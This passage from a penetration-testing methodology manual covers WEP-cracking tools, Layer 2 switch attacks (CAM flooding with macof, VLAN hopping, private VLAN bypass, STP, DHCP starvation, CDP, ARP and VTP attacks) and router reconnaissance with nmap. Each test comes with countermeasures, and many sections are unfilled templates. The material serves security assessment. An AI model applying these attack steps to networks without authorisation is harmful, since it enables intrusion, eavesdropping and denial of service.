choosing.
WIRELESS SCANNING AND ENUMERATION
Wireless Sniffers
Configuring Linux Wireless Cards for Promiscuous Mode
Air-Jack
Custom driver for PrismII (HFA384x) cards
Wireless Monitoring Tools
Prism2dump
Tcpdump
Command line tool that uses libpcap libraries to dump the network traffic. It has a very
strong scripting language support.
Ethereal
Ethereal is a multi protocol analyser ,it could act as GUI sniffer which understands
802.11b frames.
Airopeek NX
Airopeek is a comprehensive packet analyzer for IEEE 802.11b wireless LANs,
supporting all higher level network protocols such as TCP/IP, Appletalk, NetBEUI, and
IPX. Affordable and easy-to-use, Airopeek contains all of the network troubleshooting
features familiar to users of our award-winning Etherpeek. In addition, Airopeek quickly
Page 531 of 1123
isolates security problems, fully decodes 802.11b WLAN protocols, and expertly
analyzes wireless network performance with accurate identification of signal strength,
channel and data rates
Tools that exploit WEP weaknesses
Airsnort
AirSnort is a Linux-based tool written by Jeremy Bruestle and Blake Hegerle. It exploits
WEP vulnerabilities discussed in the Stubblefield, Ioannidis and Rubin paper and
requires a version of Linux using the 2.2 or 2.4 kernel or greater , wlan-ng drivers and a
network card that uses the Prism2 chipset. Once AirSnort is running, the NIC must be in
promiscuous mode and set to listen on the appropriate channel for the targeted WLAN.
Obtain the channel from the WLAN scanner used to locate the WLAN in the first place.
AirSnort comes with a shell script that will automatically launch the NIC in promiscuous
mode with the appropriate channel setting, but the channel has to be hard-coded into the
script if the default of channel 6 is not appropriate. AirSnort itself is comprised of two
separate applications – capture and crack. AirSnort will also display the number of
“Interesting Packets” (aka weak keys) that have been captured. AirSnort is efficient
because it does not capture all encrypted packets but rather only those that would be
used to crack the WEP encryption key. Interesting packets are those where the second
byte of the IV is 0xFF. Once a sufficient number of interesting packets have been
captured, attempt to crack the WEP key by launching the crack application.
WEPCrack
WEPCrack is a SourceForge project that is administered by Paul Danckaert and Anton
Rager. It is easier to use than AirSnort.
prisim-decode.pl: Used to decode data packets once the WEP key has been cracked.
prisim-getIV.pl: Extracts weak IVs and the first byte of encrypted data from a
prismdump capture.
WeakIVGen.pl: Creates a list of weak IVs and one byte of encrypted data when
provided with a specific encryption key. This script can be used to test the program in the
absence of captured data.
Page 532 of 1123
WEPCrack.pl: Used to crack WEP keys given data generated by prisim-getIV.pl.
Data capturing must be complete before using WEPCrack. A sniffer such as prismdump
must capture the data. prismdump is a very basic command line sniffer that takes no
arguments and simply captures all traffic. prismdump recognizes 802.11x headers,
which is obviously crucial to capture WEP traffic. prismdump uses the wiretap libraries
that are included with Ethereal.
WLAN Tools
DWEPCrack
Denial of Service attacks
WLANs are susceptible to the same protocol-based attacks that plague wired LANs but
to perpetrate such attacks on WLANs, an individual would first need to connect to the
network. WLANs are also susceptible to a unique form of denial-of-service (DoS) attack.
WLANs send information via radio waves on public frequencies, thus they are
susceptible to inadvertent or deliberate interference from traffic using the same radio
band.
Wlanjack
essid-jack
monkey-jack
kracker-jack
802.1x
The 802.11i task group is attempting to leverage the 802.1X standard to add
authentication controls to wireless networks. 802.1X defines Extensible Authentication
Protocol (EAP) over LANs (EAPOL), which is used to authenticate clients as they join
the network. The inclusion on 802.1X would prevent hackers from connecting to 802.11x
networks simply by determining the channel and SSID used by the network and
identifying a legitimate IP address by passively sniffing network traffic.
TKIP
Page 533 of 1123
The 802.11i draft promotes the use of Temporal Key Integrity Protocol (TKIP) to
strengthen the weak keys used by WEP. TKIP is an effort by the IEEE to engineer a
solution to strengthen the security of 802.11x networks while remaining backward
compatible with existing hardware. The IEEE would accomplish this with the distribution
of software/firmware upgrades that would add the following new algorithms to the WEP
protocol
Message Integrity Code (MIC) – to prevent forged packets
New IV sequencing discipline – to prevent replay attacks
Per-packets key mixing function – to add complexity to the correlation between IVs and
the per-packet keys with which they are used
WLAN Scanners
WLAN Sniffers
Page 534 of 1123
I.8 GLOBAL COUNTERMEASURES
1. Use longer WEP encryption keys, which makes the cryptanalysis more difficult.
If your WLAN equipment supports 128 -bit WEP keys, use it.
2. Change WEP keys frequently.
3. Place APs only on their own firewalled interface or outside a firewall.
4. Use a VPN for any protocol, including WEP that may include sensitive
information. This could be implemented using IPSec
I.9 FURTHER READINGS
1. IEEE Draft P802.1X/D10 http://grouper.ieee.org/groups/802/11/
2. A.Mishra and W. Arbaugh. An Initial Security Analysis of the IEEE 802.1X
Standard
3. Arbaugh, William A., Narendar Shankar, and Y.C. Justin Wan. "Your 802.11
Wireless Network has No Clothes."
4. Borisov,
Nikita,
Ian
Goldberg,
and
David
Wagner.Intercepting
Mobile
communications:The incsecurity of 802.11
5. Fluhrer, Scott, Itsik Mantin, and Adi Shamir. "Weaknesses in the Key Scheduling
Algorithm of RC4."
6. http://802.11ninja.net
7. Karygiannis, Tom, and Les Owens. NIST Special Publication 800-48: Wireless
Network Security ,802.1 Bluetooth and Handheld Devices
Page 535 of 1123
8. Wireless Security: Models, Threats and Solutions, by Randall K. Nichols et
al.; McGraw-Hill Telecom
9. 802.11 Wireless Networks: The Definitive Guide, by Matthew Gast; O’Reilly
Networking, 2002
10. AirSnort: http://sourceforge.net/projects/airsnort/
11. WepCrack: http://sourceforge.net/projects/wepcrack/
12. Homebrew antenna shootout: http://www.turnpoint.net/wireless/has.html
13. Hacking with a Pringles tube:
http://news.bbc.co.uk/hi/english/sci/tech/newsid_1860000/1860241.stm
Page 536 of 1123
Page 537 of 1123
J SWITCH SECURITY ASSESSMENT
J.1 DESCRIPTION
Switch and Layer 2 security is hardly considered in their implementation. In order to
perform comprehensive security test, it is important to take the concept of security to the
last step and ensure complete testing of switches and layer 2 in network. One hole is
sufficient to expose corporate LAN security. An attacker doesn’t need to attack higher
layer if bottom layer can give access to him.
J.2 PURPOSE
[Text]
Write purpose of this document not purpose of device (e.g. Router, Firewall, IDS)
J.3 REQUIREMENT
[Text]
J.3.1 Understand Organization’s environment
[Text]
J.3.2 Technical Requirements
[Text]
J.4 EXPECTED RESULT
[Text]
J.5 METHODOLOGY / PROCESS
[Text]
Brief Intro and Table of Contents
Page 538 of 1123
J.5.1 Assess General Switch Security
ƒ
Identify Switch’s management interface IP
o
Using Discovery Protocol (CDP in case of Cisco)
o
Sniffing
ƒ
Perform Banner Grabbing
ƒ
Test Telnet and HTTP connection on switch
ƒ
Identify Firmware and switch model
ƒ
Identify Switch’s feature
o
Routing Support
o
Intrusion Detection Support
o
High Availability Support
o
Firewall Support
Note: If a feature is supported, test mentioned tasks in their respective domain e.g. for
Firewall Support, Firewall Security Assessment document.
J.5.2 Assess Port Security
o
Test Content Addressable Memory (CAM) Security
o
Test Port broadcast-storm control
J.5.3 Assess VLAN Hopping Attacks
o
Test VLAN Hopping Attacks by switch spoofing
o
Test VLAN Hopping attacks by double encapsulation
J.5.4 Assess Private VLAN Attacks
o
Layer two proxy attacks
o
Private VLAN hopping using ICMP echo reply messages (In Cisco
implementation)
J.5.5 Spanning Tree Attacks
J.5.6 DHCP “Starvation”
J.5.7 Cisco Discovery Protocol (CDP) Attacks
J.5.8 VTP Attacks
J.5.9 Vulnerabilities identification and target penetration
Page 539 of 1123
J.6 ASSESS GENERAL SWITCH SECURITY
Description
[Text]
Objective
[Text]
Expected Results
[Text]
Pre-requisites
[Text]
Process (Steps to complete this Process/Task/Test Case)
J.6.1 Identify Switch’s management interface IP
•
Using Discovery Protocol (CDP in case of Cisco)
•
Sniffing
J.6.2 Perform Banner Grabbing
J.6.3 Determine Switch Management Security
•
Identify SNMP Communitystring
•
Check Telnet, HTTP, TFTP, FTP, syslog connections
o
•
Implement secure variant
ƒ
Telnet – SSH
ƒ
TFTP – SCP
Check Out of Band Management
J.6.4 Identify Firmware and switch model
J.6.5 Identify Switch’s feature
(If a feature is supported, test mentioned tasks in their respective domain)
Page 540 of 1123
•
Routing Support
•
Intrusion Detection Support
•
High Availability Support
•
Firewall Support
J.7 ASSESS PORT SECURITY
Description
Restrict input on an interface by limiting and identifying MAC addresses of the hosts that
are allowed to access the port. After limiting MAC addresses to one and assigning a
single MAC address the attached host is assured full bandwidth of the port.
A port is configured as secure port and its security is violated:
1. If attempt is made from any other MAC address other then the MAC address
listed in port security address list.
2. If the maximum number of MAC addresses are reached.
3. If a host from secure port, trying to access secure port of another host.
Objective
•
To determine Content Addressable Memory (CAM) Security
•
To determine broadcast-storm control capability on switch
Expected Results
[Text]
Pre-requisites
[Text]
Process (Steps to complete this Process/Task/Test Case)
•
Test Content Addressable Memory (CAM) Security
•
Test Port Storm Control
Page 541 of 1123
J.8 TEST CONTENT ADDRESSABLE MEMORY (CAM) SECURITY
Description
Content Addressable Memory contains MAC addresses, port numbers and their associated
VLAN parameter. As a switch receives a frame, he looks in the CAM table for the
destination MAC address. If there is an entry exists for that address, switch forwards his
request to concern port, if there is no entry; switch broadcast this request to every port like
a hub. If switch get a response, he updates the CAM table.
Content Addressable Memory (CAM) table is of limited size. If this table is filled by bogus
addresses up to its maximum limit, no new valid entries can take place here and further a
switch will act like a hub.
Objective
•
To determine MAC address restrictions on your PC initially
•
To determine MAC Address’s maximum limit
•
To determine secure port isolation
Pre-requisites
•
MAC Address Spoofer
•
Two PCs
•
One Switch
Steps to be performed
Used macof from Dsniff suit to overflow CAM Table
•
Macof floods CAM Table and changes switch’s functionality to Hub
•
Traffic without CAM entry floods on the local LAN
•
Traffic with CAM entry remain same
•
After CAM table is full in one switch, traffic can floods to other switch on same
VLAN
Examples/Results
Syntax
Macof [-I interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
Page 542 of 1123
<Diagram>
Analysis/Conclusion/Observation
•
Traffic without CAM entry floods on the local LAN
•
Traffic with CAM entry remain same
•
As CAM table is full, traffic floods to other switch on same VLAN
Countermeasures
•
Configure all MAC addresses manually by using (switchport port-security mac-address
mac_address interface configuration command)
•
Configure number of addresses manually and allow rest to be configured dynamically
•
Port Security Limits MAC addresses to a port.
•
#port secure max-mac-count n (n can be decided depending on the business
requirement at IDC)
•
On detection of invalid MAC, configure switch to
o
Configure switch to block invalid MAC
o
Switch can also be configured to shutdown the port
Tool[s]
Further Reading[s]
Remarks
It is recommended to use this in control environment; you can do this by adding MAC
addresses more than switch ports. It will fill the MAC addresses required to change hub
into switch.
Page 543 of 1123
J.9 TEST PORT BROADCAST-STORM CONTROL
Description
This test is conducted to test broadcast-storm control on Switch. Tester sends flood on any
destination to test this feature.
Objective
•
To determine Switch’s support against broadcast-storm control
Pre-requisites
•
Packet Crafter
•
PC with OS
•
Switch
Steps to be performed
1. Start any packet generator
2. Give a flood on target system
Examples/Results
Analysis/Conclusion/Observation
If your switch is disconnecting your port it provide safeguard against broadcast-storm
otherwise your switch is vulnerable to broadcast-storm control.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 544 of 1123
J.10 ASSESS VLAN HOPPING ATTACKS
Description
In VLAN hopping attack, attacker sends crafted frames from a system to another system
in different VLAN. In this attack VLAN security is bypassed.
Objective
Expected Results
Pre-requisites
Process (Steps to complete this Process/Task/Test Case)
•
Test VLAN Hopping Attacks by switch spoofing
•
Test VLAN Hopping attacks by double encapsulation
Page 545 of 1123
J.11 TEST VLAN HOPPING ATTACKS BY SWITCH SPOOFING
Description
In this attack an attacker configures his system to spoof frames as a switch. He craft
frames using 802.1q/ISL or other tagging (e.g. ISL) with DTP signaling and sends it from
management VLAN to target VLAN with the tag of target VLAN. It is expected to see this
packet in target VLAN. If he is successful to do so, then he will be part of all VLANs.
Objective
•
To pass data into another VLAN in more then one switches by manipulating frame tag.
Pre-requisites
•
Sniffing software (which supports frame check sequence and preamble
•
Two Cisco Ethernet switches supporting 802.1q trunking (Cat 1900 switches doesn’t
support it)
•
One Crossover cable
•
Two strait cables
•
Two PCs with Windows/Unix operating system having 10Mb Ethernet NIC
•
Console cable for switch
Steps to be performed
ƒ
Capture Sample Frame
ƒ
Change 802.1q tag as per target
ƒ
Send 802.1q Frames into non-trunk ports
Step1: Capture sample frame
ƒ
Connect two PCs in the same VLAN of one switch.
ƒ
Send ICMP echo message from PC1 to PC2
ƒ
Capture this with Sniffer Pro on PC 2
ƒ
View packets in raw hex
ƒ
Start Packet generation component of sniffer pro
ƒ
Enter above captured packet in step 3
ƒ
Send entered packet from PC1 to PC 2
Step2: Insert 802.1q tag
ƒ
Shift PC2 on trunk port (port 24) of switch and start Sniffer software
Page 546 of 1123
ƒ
Ping non-existent IP address from PC1
ƒ
Capture ARP lookup on PC2
ƒ
Shift PC1 on VLAN 2 port and repeat it
VLAN1 and VLAN2 will have 81 00 00 01 and 81 00 00 02 tag respectively
Step3: 802.1q Frames into non-trunk ports
ƒ
Put PC1 on VLAN 1 switch one
ƒ
Put PC2 on VLAN1 of second switch
ƒ
Connect trunk cable between them
ƒ
Crafted packet from VLAN1, VLAN2 and VLAN3 was delivered to their destination
VLAN
Step4: VLAN Hopping
ƒ
Connect PCs in different VLANs and in different switches
ƒ
Change VLAN IDs and send it to as many combinations as possible
Examples/Results
Analysis/Conclusion/Observation
In Different Switches
Source VLAN
Destination VLAN
Tag ID
Success?
1
2
2
Yes
1
3
3
Yes
2
1
1
No
3
2
3
No
3
1
1
No
Source VLAN
Destination VLAN
Tag ID
Success?
1
2
2
No
1
3
3
No
2
1
1
No
3
2
3
No
3
1
1
No
In Same Switch
Page 547 of 1123
Countermeasures
•
Separate Network’s clearly in logical access points.
•
Turn of the ports that are not used and put them in separate VLAN, these ports
shouldn’t have layer 3.
•
Devices on one VLAN shouldn’t access devices on another VLAN unless specific
mechanisms like routing or trunking for doing so.
•
Isolate devices at different security levels on separate layer 2 devices. E.g. same
switch shouldn’t be used inside or out side of firewall.
•
Use trunk port security
o
Never use a trunkport number used in any other VLAN.
o
Disable trunking on ports that do not need it.
o
Set DTP on all ports not being used for trunking.
o
Use dedicated VLAN IDs for trunk ports.
Tool[s]
Further Reading[s]
Remarks
Attack is not easy, following things are mandatory to perform this attack:
ƒ
Access to native VLAN
ƒ
Target machine is in different switch
ƒ
Attacker knows MAC address of the target machine
ƒ
Some layer 3 device for traffic from targets VLAN to back
Page 548 of 1123
J.12 TEST VLAN HOPPING ATTACKS BY DOUBLE ENCAPSULATION
Description
An attacker sends double encapsulated 802.1q frames. Switch strips of one tag and deliver
it to destination as per remaining tag. This attack even works if the trunk port is off.
<Diagram>
Objective
To pass data into another VLAN in more then one switches by double encapsulating frame
tag.
Pre-requisites
•
Sniffing software (Ethereal is fine)
•
Two Cisco Ethernet switches supporting 802.1q trunking (Cat 1900 switches doesn’t
support 802.1q tagging, they are limited with Inter Switch Link (ISL))
•
One Crossover cable
•
Two strait cables
•
Two PCs with Windows/Unix operating system having 10Mb Ethernet NIC
•
Console cable for switch
Steps to be performed
•
Craft a double encapsulated frame
•
Start a sniffer at the destination end
•
Send the double encapsulated frame
•
Capture the double encapsulated frame at destination
Examples/Results
<Screen shot of test performed>
Analysis/Conclusion/Observation
•
Supports only unidirectional traffic.
•
Works even if trunk ports are set to off
Countermeasures
Page 549 of 1123
Tool[s]
Further Reading[s]
Remarks
Page 550 of 1123
Countermeasures
Patches Updating
Patches should be implemented as they are released after testing. Follow patch
management process for more detail.
Safeguard Defaults
•
Change community string and treat it as password
•
Change all factory default passwords
•
Identify undocumented accounts and change the default names and passwords
Unnecessary Services
•
Make sure all the unnecessary services are disabled.
•
Management interface of switch is not accessible from Internet
•
Access Control Mechanism is implemented to give access on need to know basis
•
Make sure un-secure services are disabled
o
TFTP
o
SNMP
o
Telnet
Implement Encryption
Usually encryption is not implemented in the switch. Encryption on the wire ensures that
sniffed traffic is useless.
Further Readings
•
Configuring VLANs
http://www.cisco.com/en/US/products/hw/switches/ps663/products_configuration_guide_
chapter09186a00800e47e1.html#1020847
Page 551 of 1123
J.13 ASSESS PRIVATE VLAN ATTACK
Description
Private VLANs works by isolating traffic within specific communities. It’s a VLAN within a
VLAN and also called as protected ports. It turns broadcast segment into non-broadcast
multi-access segments. Isolated ports within a VLAN can communicate only with
promiscuous ports.
Private VLAN environment doesn’t require unicast, multicast or broadcast traffic between
interfaces of switch. Traffic between interfaces of switch is forwarded through a layer-3
device.
Objective
Expected Results
Pre-requisites
Process (Steps to complete this Process/Task/Test Case)
•
Test Layer-2 Proxy Attacks
•
Product specific miss-configurations in the project
Page 552 of 1123
J.14 BYPASS PVLAN USING LAYER-2 PROXY ATTACKS
Description
In this attack attacker craft a packet and send it to target with source IP and MAC address
of his own and destination IP of target and MAC address of router (layer-3 device). The
switch forwards frame to router’s switch port. The router routes the traffic, rewrites the
destination MAC address as that of the target and send it to router.
This is not the vulnerability of Private VLAN, this is the way PVLAN works, but using
technique Private VLAN security is bypassed however only unidirectional traffic is allowed.
Objective
Bypassing Private VLAN security using Layer-2 Proxy Attacks
Pre-requisites
•
Two PCs with operating system
•
Packet crafter (eg. Hping)
•
Router and Switch
•
Strait and Cross-over cable
•
Isolated and Promiscuous ports
Steps to be performed
•
Craft a customize packet using your favorite packet crafter
o
Give source IP and MAC address of attacker
o
Give destination IP address of target
o
Give MAC address of Router (layer-3 device)
•
Start a sniffer at the target
•
Capture and analyze the packet at target end
Examples/Results
Analysis/Conclusion/Observation
Page 553 of 1123
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 554 of 1123
J.15 PRODUCT SPECIFIC MISS-CONFIGURATIONS
J.16 ASSESS SPANNING TREE SECURITY
J.16.1
STP root bridge SUMPLANTACION
Description
An attacker broadcasts out Spanning-Tree Protocol Configuration/Topology Change Bridge
Protocol Data Units (BPDUs) in an attempt to force spanning-tree recalculations. The
BPDUs sent out by the network attacker’s system announce that the attacking system has
a lower bridge priority and he became root-bridge.
Objective
Become the root or the spanning tree. As root of the bridge we are able to select how the
traffic is redirected between the switches, and how loops are avoided
Pre-requisites
•
One PC with operating system
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 555 of 1123
Countermeasure[s]
•
Don’t disable spanning tree, introducing loop would be another attack
•
Implement BPDU Guard and Root Guard
•
Implement BPDU Guard
•
o
Disables ports using portfast upon detection of a BPDU message on the port
o
Globally enabled on all ports running portfast
Implement Root Guard
•
Disables ports who would become rootguard due to their BPDU advertisement
configured on a per port basis
Further Reading[s]
Page 556 of 1123
J.17
ASSESS DHCP STARVATION
Description
The attacker crafts DHCP request over the cable but without sending the DHCP release.
Objective
The issue of this attack is to request the full domain of IP addresses available
Pre-requisites
Access to the network and to the DHCP server (it may be the bridge or may redirect to
another hosts.
Steps to be performed
Examples/Results
The expected result of this attack is the denial of legitimate DHCP requests of devices
because of the absence of free IP.
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 557 of 1123
J.18 ASSESS CISCO DISCOVERY PROTOCOL ATTACKS
Description
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link
(segment). This protocol is not routed and therefore this tool is just useful in the local
segment. CDP messages contain information about the sending Cisco router. These
include the device ID (hostname), port ID (which port was the sender), the platform running
on, the software incl. version, what the box is capable of and which network address (IP
address) the interface has. If not configured otherwise, Cisco routers send these messages
out every 30 seconds. In our case (Ethernet), they are send to a special MAC address
(01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same
segment. Other routers store the data and hold it for a time defined in the message (the
tool uses the maximum of 255 seconds). Very interesting is, that Cisco IOS uses the device
ID as key to find out if the received message is an update and the neighbors are already
known or not. If the device ID is to long, this test seems to fail and you constantly fill up the
routers memory.
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
•
CDP was found to be implemented on core router.
•
An attacker can flood the router memory completely with bogus CDP messages.
•
CDP packets can be spoofed for social engineering and/or jut to confuse the
administrator
•
Cisco router information (device ID (hostname), port ID, platform running on, software
version and IP address) can be seen in clear text
Page 558 of 1123
Countermeasures
•
•
Disable CDP if not required
o
no cdp run: disables CDP globally
o
no cdp enable: disables CDP on an interface (interface command)
Highly recommended to disable at Border Routers/Switches etc…
Tool[s]
Further Reading[s]
Remarks
Page 559 of 1123
J.19 ASSESS ARP ATTACKS
Description
Gratuitous ARP is used by host to announce their IP address. It's a broadcast packet like
an ARP request.
ARP cache poisoning attacks involve using a known MAC and IP address of a host on a
remote VLAN to get the switch to forward packets.
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Testing team machine MAC address was not asked while providing access points for them.
We presume that same may be the case for servers and gateway devices.
Countermeasures
•
Private VLANs provides protection against ARP attacks.
•
Consider static ARP for critical static routers and hosts
•
Cisco is under development of an ARP firewall
•
Consider implementation of registering MAC addresses for customers, suppliers
and vendors
•
ARPWatch is a freely available tool
Tool[s]
Further Reading[s]
Page 560 of 1123
Remarks
Page 561 of 1123
J.20 ASSESS VTP ATTACKS
Description
The VLAN Trunking Protocol (VTP) is used to distribute Vlan configuration among
switches. This protocol allows you to maintain a set of Vlans in a multi-switch
environment without the need of manually keep all the configurations actualized.
This protocol is only sent over trunking ports, and with Mac destination 01:00:0c:cc:cc:cc
Objective
Alter the VLAN configuration in all the switches of a trunking domain
Expected Results
Full control of the VLAN configurations in a switch environment
Pre-requisites
Access to the switch in a port with Trunking enabled.
Several switches with VTP configured
Process (Steps to complete this Process/Task/Test Case)
1.
2.
Page 562 of 1123
J.21 VLAN RECONFIGURATION
Description
The VTP protocol is used to update the VLAN configuration in a switch environment, so
you can update it to your wishes by crafting the apropiate packet
Objective
Reconfiguration of the VLAN environment to gain access to certain elements
Pre-requisites
Access to the switch in a port with Trunking enabled.
Several switches with VTP configured
Steps to be performed
Develop and craft the packet with the Vlan configuration through the trunking port of the
switch
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable VTP if not needed
If needed, set a MD5 password, as the protocol supports that kind of authentication of the
VTP messages
Tool[s]
Further Reading[s]
Remarks
Page 563 of 1123
J.22 LAYER 2 PORT AUTHENTICATION
Description
Layer 2 authentication can allow VLAN access based on MAC address or radius
authentication
Objective
Denial of service test (prevention of validation) or unauthorized access to other VLAN’s.
Expected Results
Succesful validation in the switch or denial of service , based on impersonation of the
validation server
Pre-requisites
PC with operating system and NIC
Process (Steps to complete this Process/Task/Test Case)
•
802.1x/EAP Switch Authentication
•
802.1X Port Authentication
Page 564 of 1123
J.22.1
802.1x/EAP Switch Authentication
Description
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 565 of 1123
J.22.2
802.1X Port Authentication
Description
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 566 of 1123
J.23
MULTICAST BRUTE FORCE FAILOVER ANALYSIS
Description
Send Random Multicast Frames to a switch interface attempting to get frames to another
VLAN
Objective
Find if a multicast domains can go through the switch to another VLAN
Pre-requisites
2 PC with operating system and NIC connected to different VLAn’s
Steps to be performed
•
Craft a customize packet using your favorite packet crafter
o
Give real source
o
Give random destinations in the multicast reserved space
•
Start a sniffer at the second PC to view if any traffic goes through
•
Review switch console and errors logs
Examples/Results
Analysis/Conclusion/Observation
If any multicast packet reaches the second PC, then this multicast domain is allowed to go
through and thus can be used to attack machines in other VLAN’s
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 567 of 1123
J.24
RANDOM FRAME STRESS ATTACK
Description
In this attack, intruder sent some completely random packet in which only source and
destination are correct.
Objective
It’s some kind of “brute force” to test the robustness of the logical of the switch. If we are
able to see errors, packets that do vlan hoping, switch reboot, etc.
Pre-requisites
•
Two PCs with operating system
•
Packet crafter (eg. Hping)
•
Switch
•
Strait and Cross-over cable
•
Isolated and Promiscuous ports
Steps to be performed
•
Craft a customize packet using your favorite packet crafter
o
Give real source and destinations
o
Give MAC address of Router (layer-3 device)
•
Start a sniffer at the second PC to view if any traffic goes through
•
Review switch console and errors logs
Examples/Results
Analysis/Conclusion/Observation
Any error seen on the switch, anomalous traffic or such could be an indication of a wrong
switch software version or bug
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 568 of 1123
Page 569 of 1123
J.25
IP TELEPHONY CONSIDERATIONS
Description
Usually IP telephony is deployed by using a VLAN for it’s traffic all along the company
network. Also, reachable in this VLAN there must be some interesting machines such the
Call Manager.
Objective
•
Gain access to the VLAN used by IP Telephony
•
Reach ability to the Call Manager and all the IP Telephony equipment (to do further
vulnerability identification, phone call listening, denial of service, etc.)
Pre-requisites
•
1 PC with operating system and NIC
•
1 IP phone fully functional and connected
•
1 Hub
Steps to be performed
With the Hub intercept the communications of the phone, you can see there the VLAN tag
ID used for it’s traffic usually tagging you own traffic with this ID is enough to get your traffic
into the IP Telephony VLAN.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Vconfig
Further Reading[s]
Remarks
Page 570 of 1123
J.26 VULNERABILITIES IDENTIFICATION AND VERIFICATION
Perform this step based on ISSAF Technical Assessment Methodology section.
J.27 GLOBAL COUNTERMEASURES
J.28 FURTHER READING[S]
1. Research Report: Secure Use of VLANs: An @stake Security Assessment—August
2002, http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/stake_wp.pdf
2. Cisco Safe, http://www.cisco.com/go/safe/
3. Best Practices for Catalyst 4500, 5000, and 6500 Series Switch Configuration and
Management http://www.cisco.com/warp/public/473/103.html
4. Multipurpose Dsniff, by Dug Song, http://monkey.org/~dugsong/dsniff/
5. SANS’ out dated VLAN Security paper
http://www.sans.org/newlook/resources/IDFAQ/vlan.htm
6. ARP spoofing attack:
http://www.sans.org/newlook/resources/IDFAQ/switched_network.htm
7. White Paper: Catalyst 6500 Series Service Provider Feature (Private VLANs),
http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/c65sp_wp.htm
8. An Ethernet Address Resolution Protocol, RFC 826, http://www.ietf.org/rfc/rfc0826.txt
Page 571 of 1123
J.29 APPENDIX 1: CATALYST SWITCH FEATURE SUPPORT
Cat
Port Security
2900 Cat
3500 Cat
Cat
Cat 29XX Cat
OS Cat
OS IOS
XL
XL
2950
3550
G
4000
6000
4000
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
Private
VLANs
STP BPDU
STP Root
X
X
SSH
Support
VMPS Client
X
X
VMPS
Server
802.1X Auth
X
X
Wire Rate
X
X
Page 572 of 1123
K ROUTER SECURITY ASSESSMENT
Description
Routed Issues
•
Miss-configurations are same in individual routing devices as other hosts
•
Product specific vulnerabilities
•
A compromise on routing device compromises entire network traffic
Routing Issues
•
Without direct compromise to routing device, it can be used to compromise the
entire network
•
Routing devices are used to direct network traffic and any one router can be used
to manipulate network traffic
Objective
•
To assess end-to-end router security with target knowledge and/or without target
knowledge
•
To
provide
single
point
reference
for
router
security
assessment
and
countermeasures for identified weaknesses.
Requirement
•
•
Understand Organization’s Environment
o
Understand router placement in network architecture
o
Understand traffic managed by router
o
Understand traffic passed through router
Technical Requirements
•
Knowledge of basics of routing
•
Knowledge of routing protocols for routing protocol attacks
•
Specific technical requirements are given in each test case
Page 573 of 1123
Expected Results
•
Information gathering about Router from target organization
•
Compromise on remote network though
•
o
Product specific vulnerabilities on router
o
Mis-configuration on router
o
Without direct compromise on router
Compromise on router through
o
Password cracking
o
HTTP access insecurities
o
SNMP insecurities
o
VTY/TTY access insecurities
o
TFTP insecurities
o
Console port insecurities
Methodology / Process
•
•
Router Identification
o
Getting the router hostname
o
Port scanning
o
OS detection + Versioning
o
Perform protocol scanning
o
Test Packet Leakage
Assess common Issues
o
Mis-configurations
o
VTY/TTY Connections
o
Exec timeout
o
HTTP Connections
o
Simple Network Management Protocol (SNMP )
o
TFTP
o
Finger
o
Cisco Discovery Protocol (CDP)
o
Network Time Protocol (NTP)
o
Access to Console Port
o
Password Security
Page 574 of 1123
•
•
o
Loose and Strict Source Routing
o
IP Spoofing
o
TCP Sequence predictability
o
Forged UDP Packets
o
IP Packet Handling bugs
o
ICMP Redirects
o
ARP Attacks
Assess Routing Protocols
o
Autonomous System Scanning
o
RIP (Router Information Protocol)
o
Open Shortest Path First (OSPF)
o
Border Gateway Protocol (BGP)
o
IRDP
o
IGRP
o
EIGRP (Discovery)
Assess Denial of Service Attacks
Page 575 of 1123
K.1 ROUTER IDENTIFICATION
K.1.1.1 IDENTIFY THE ROUTER HOSTNAME
Description
Identifying the router hostname is just for informative purposes only and also you don’t
need to type IP addresses all the time.
If the router is registered with DNS, a reverse query on the router’s IP address will give you
the DNS name of the router. This DNS name might be the same as the hostname.
Pre-requisite[s]
•
Target router IP address
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Do not register the router in DNS
Tool[s]
•
Dig, nslookup, host…
Further Reading[s]
Remarks
Mostly router entries are never made in DNS server
Page 576 of 1123
K.1.1.2 PORT SCANNING
See the port scanning section of the ISSAF methodology. Scan router’s default services.
Port
Service
Protocol
23
Telnet
TCP
80
HTTP
TCP
161
SNMP
UDP
K.1.1.3 OS DETECTION + VERSIONING
Description
Finding the operating system and version of the router device allows attackers/penetration
testers to find specific vulnerabilities and possibly exploits as well. The expected results are
the router type & OS version
Pre-requisite[s]
•
The IP address of the router
•
A list of open and closed ports
Examples/Results
# nmap –sS –O –sV <router ip address>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
•
Nmap
Further Reading[s]
The following sections of the ISSAF methodology document: portscanning, operating
system scanning, banner grabbing
Remarks
Page 577 of 1123
Page 578 of 1123
K.1.1.4 PERFORM PROTOCOL SCANNING
Description
Performing protocol scanning against a router can identify what protocols (including routing
protocols) are supported by the router. This is needed for the routing protocols test further
in this chapter.
Pre-requisite[s]
Process
Examples/Results
# nmap –sO <router ip address>
Analysis/Conclusion/Observation
Countermeasures
•
Only allow the necessary protocols
•
Disable services which are not in use
•
